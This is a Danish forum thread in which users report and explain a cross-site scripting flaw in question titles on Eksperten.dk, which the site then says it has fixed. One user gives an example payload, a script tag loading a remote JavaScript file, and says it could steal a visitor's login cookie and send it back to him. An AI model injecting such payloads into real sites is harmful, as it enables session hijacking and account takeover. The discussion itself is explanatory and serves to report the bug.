CrossSiteScripting på Eksperten.

det er da som det skal være, spm's titel bliver vidst på samme måde i både windowtitle og overskrift på E...

Der er i hvert fald problemer med HTML, for man kan ikke angive HTML i sp. titel uden der går kage idet.

Jeg har gjort opmærksom på problemet i "Om Eksp.", men har ikke fået respons fra nogen der kunne afhjælpe problemet. Derfor har jeg et sp. som jeg ikke kan lukke:

http://www.eksperten.dk/spm/158099

nå på den måde, det må du sq undskylde, jeg havde msiforstået dit indlæg! :)

Det er bare i orden :-)

jette1> Det er akkurat det samme problem du har oplevet ;o)

/Thor

Til Thor

De skriver bl.a. på den side du henviser til:

"Because one source is injecting code into pages sent by another source, this vulnerability has also been described as "cross-site" scripting."

Et eksempel:
Lad os sige at man her på eksperten, ikke havde taget højde for at man kan indsætte f.eks. javascript når man opretter et spørgsmål.
En ondsindet bruger indsætter et skadeligt script i et spørgsmål. Dette script bliver nu afviklet i browseren hos alle de brugere der kigger på spørgsmålet.

Man kan altså på den måde få sit script afviklet hos andre, via et website. Og det er det man kalder cross site scripting... sådan som jeg opfatter det i hvert fald :-)

jette1> Det har du ganske ret i :)

I Eksperten.dk's tilfælde kunne jeg f.eks. oprette et spørgsmål der hed

<script src="http://jscript.dk/fnis.js"></script>

Når brugeren så spørgsmålet ville det ovenstående være en del af HTML koden og dermed blive afviklet. "fnis.js" kunne så f.eks stjæle din cookie og sende den til mig, hvorefter jeg kunne logge ind i dit navn.

/Thor

Thor -> Ja, det er samme problem jeg har omtalt, men jeg tror du blev misforstået her fordi du skrev <TITLE> ... set det er jo straks noget helt andet :-)

Thor -> Jeg kan kun en lille smule javascript ... Kan man virkelig kopiere filer vha. javascript fra folks pc'er? Skræmmende tanke!

Nej, man kan ikke kopiere filer men det Javascript (fnis.js) som jeg ville kunne inkludere i HTML koden ville jo kunne aflæse din cookie ;)

/Thor

det er rettet. tak :)

Nåh, ja -- browseren sender jo indholdet at cookien til sitet... nu er jeg med :-))

Whee, det er den jo også :)

/Thor